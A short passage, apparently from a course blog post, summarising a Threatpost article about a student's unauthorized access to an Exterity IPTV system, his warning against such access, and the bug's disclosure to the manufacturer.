Duong was very clear that he was lucky that the administration didn’t pursue criminal charges against him for unauthorized access. He notes in the article that people should “never access other systems in an unauthorized manner without permission.” The vulnerability has been reported to the manufacturer, although it’s unclear if this has been fixed.

Author: Becky Bracken

Published: October 14, 2021

Link: https://threatpost.com/rickroll-exterity-iptv-bug/175491/

Filed Under: Week 8 Tagged With:
